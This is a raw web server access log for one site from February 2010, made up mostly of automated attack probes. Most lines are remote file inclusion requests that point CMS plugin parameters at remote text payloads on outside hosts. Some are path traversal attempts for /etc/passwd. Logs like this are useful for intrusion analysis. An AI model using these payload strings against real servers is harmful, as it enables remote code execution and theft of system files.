203.250.124.252 - - [19/Feb/2010:06:53:11 -0800] "GET /logs/access_100115.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [19/Feb/2010:06:53:30 -0800] "GET /logs/access_100118.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [19/Feb/2010:06:53:30 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [19/Feb/2010:06:53:30 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [19/Feb/2010:06:53:36 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [19/Feb/2010:06:53:36 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [19/Feb/2010:06:53:36 -0800] "GET /logs/access_100118.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:53:48 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:53:48 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:53:48 -0800] "GET /logs/access_100123.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:53:55 -0800] "GET /logs/access_100114.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:06:54:04 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:06:54:04 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:06:54:04 -0800] "GET /logs/access_100204.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:54:05 -0800] "GET /logs/access_100125.log/index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:54:05 -0800] "GET /index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:54:05 -0800] "GET /logs/index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:54:08 -0800] "GET /logs/access_100125.log/index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:54:08 -0800] "GET /index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:06:54:08 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:06:54:08 -0800] "GET /logs/access_100120.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:06:54:08 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:54:08 -0800] "GET /logs/index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:06:54:15 -0800] "GET /logs/access_100120.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:06:54:15 -0800] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:06:54:15 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:54:38 -0800] "GET /logs/access.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.251.80.167 - - [19/Feb/2010:06:54:38 -0800] "GET /logs/access_100121.log//index.php?option=com_performs&Itemid=&mosConfig_absolute_path=http://board.satportal.to/sitemap/vbulletin/image1.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:06:54:48 -0800] "GET /logs/access_100210.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
121.254.172.27 - - [19/Feb/2010:06:54:50 -0800] "GET /logs/access_100120.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:54:57 -0800] "GET /logs/access_100201.log/index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
94.23.18.102 - - [19/Feb/2010:06:55:00 -0800] "GET /logs/access_100201.log/index1.php?sivu=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:06:55:00 -0800] "GET /logs/access_100210.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:33 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:33 -0800] "GET /logs//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:34 -0800] "GET /index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:36 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:36 -0800] "GET /logs//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:36 -0800] "GET /index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
67.195.111.172 - - [19/Feb/2010:06:55:41 -0800] "GET /logs/access_090528.log HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:55:45 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:55:45 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:06:55:45 -0800] "GET /logs/access_100123.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:46 -0800] "GET /index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:46 -0800] "GET /logs//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:46 -0800] "GET /logs/access_100117.log%20%20//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:48 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:55:52 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
121.254.172.27 - - [19/Feb/2010:06:56:01 -0800] "GET /logs/access_100120.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:06:56:03 -0800] "GET /logs/access_100205.log%20%20//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.15.127.10 - - [19/Feb/2010:06:56:59 -0800] "GET /logs/access_100104.log//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:06:58:26 -0800] "GET /logs/access_100120.log%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:06:59:05 -0800] "GET /logs/access_100205.log//?index.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:06:59:05 -0800] "GET /logs/access_100122.log//?index.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:06:59:05 -0800] "GET /logs//?index.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
82.179.244.69 - - [19/Feb/2010:06:59:06 -0800] "GET /?index.php?mosConfig_absolute_path=http://www.esquilu.com/portal//modules/PNphpBB2/includes/fx29id2.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.54.22.2 - - [19/Feb/2010:06:59:41 -0800] "GET /logs/access_100120.log%20/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://shop.esmok.ch//images/stories/fruit/idi.txt?%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:00:18 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:00:21 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:00:27 -0800] "GET /logs/access.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:07:00:30 -0800] "GET /logs/access_100104.log//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:07:00:33 -0800] "GET /logs/access_100104.log//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:07:00:44 -0800] "GET /logs/access_100114.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:00:44 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:00:45 -0800] "GET /logs/access_100121.log%20%20//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:00:45 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:07:00:46 -0800] "GET /logs/access_100117.log//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:07:00:48 -0800] "GET /logs/access_100117.log//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:00:50 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:00:50 -0800] "GET /logs/access_100125.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:00:50 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:07:00:51 -0800] "GET //vwar/backup/errors.php?error=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:00:55 -0800] "GET /logs/access_100115.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:00:55 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:00:55 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:07:00:55 -0800] "GET /logs///vwar/backup/errors.php?error=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.12 - - [19/Feb/2010:07:00:55 -0800] "GET /logs/access.log///vwar/backup/errors.php?error=http://www.villantomagazin.com//1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.250.124.252 - - [19/Feb/2010:07:00:58 -0800] "GET /logs/access_100119.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:01:39 -0800] "GET /components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:01:39 -0800] "GET /logs/access_100125.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:01:39 -0800] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
203.250.124.252 - - [19/Feb/2010:07:02:29 -0800] "GET /logs/access_100126.log//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.progettosolidarieta.eu//assets/snippets/jot/baner.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.15.127.10 - - [19/Feb/2010:07:03:15 -0800] "GET /logs/access_100117.log//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.15.127.10 - - [19/Feb/2010:07:03:15 -0800] "GET /logs/access_100205.log//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.167.62.166 - - [19/Feb/2010:07:03:41 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.puaga.com"
83.167.62.166 - - [19/Feb/2010:07:03:42 -0800] "GET /index.php HTTP/1.1" 200 3642 "-" "Mozilla/5.0 (compatible; Exabot/3.0 (BiggerBetter); +http://www.exabot.com/go/robot)" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:07:04:32 -0800] "GET /logs/access_100104.log//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:04:38 -0800] "GET /logs/access_100206.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.136.40.7 - - [19/Feb/2010:07:04:45 -0800] "GET /logs/access_100117.log//index.php?option=com_letterman&mosConfig.absolute.path=http://www.neosemitech.com/board/data/session/f4/des/images/byz9991.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:05:36 -0800] "GET //ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:05:36 -0800] "GET /logs///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:05:36 -0800] "GET /logs/access_100129.log%20%20///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:05:42 -0800] "GET /logs/access_100206.log//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:06:38 -0800] "GET /logs/access_100127.log%20%20///ktmlstandard/includes/ktedit/toolbar.php?dirDepth=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:07:05 -0800] "GET /logs/access_100121.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:07:05 -0800] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:07:06 -0800] "GET /index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:07:07:11 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:07:07:11 -0800] "GET /logs/access_100118.log%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:07:07:11 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://cyber-cigarette.fr//components/com_virtuemart/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:07:17 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:07:17 -0800] "GET /logs/access_100123.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:07:17 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.240.113.151 - - [19/Feb/2010:07:07:23 -0800] "GET /logs/access_100206.log%20%20//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://210.205.6.168/~shop/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [19/Feb/2010:07:07:31 -0800] "GET /logs/access_100122.log//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:08:02 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:08:02 -0800] "GET /logs/access_100123.log/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:08:02 -0800] "GET /logs/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.64.70.246 - - [19/Feb/2010:07:08:43 -0800] "GET /logs/access.log%20%20/components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.azovcable.ru/backup/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:07:08:46 -0800] "GET /logs/access_100124.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
